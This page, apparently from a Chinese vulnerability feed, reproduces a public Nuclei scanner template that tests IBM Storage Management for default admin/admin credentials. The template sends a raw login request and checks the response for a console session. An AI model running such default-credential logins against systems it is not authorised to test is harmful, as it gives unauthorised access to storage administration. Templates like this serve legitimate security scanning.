ibm-storage-default-login: IBM Storage Management Default Login

日期: 2025-08-01 | 影响软件: IBM Storage Management Default Login | POC: 已公开

漏洞描述

IBM Storage Management default admin login credentials were discovered.

PoC代码[已公开]

id: ibm-storage-default-login

info:
  name: IBM Storage Management Default Login
  author: madrobot
  severity: high
  description: IBM Storage Management default admin login credentials were discovered.
  reference:
    - https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: default-login,ibm,storage,vuln

http:
  - raw:
      - |
        POST /0/Authenticate HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}&continue=&submit=submit+form

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/0/Console"
          - "Property of IBM"
        condition: and
        part: body

      - type: word
        words:
          - "JSESSIONID"
        part: header

      - type: status
        status:
          - 200
# digest: 490a0046304402205e95943542878c670fbd2af86bd5682b531f7af799d39963a4ed2d1f29d67fca02206ab04dfcbabf464346f37ec8eb9815edad9e60d7ce429543eadf8e49f534afca:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/ibm/ibm-storage-default-credential.yaml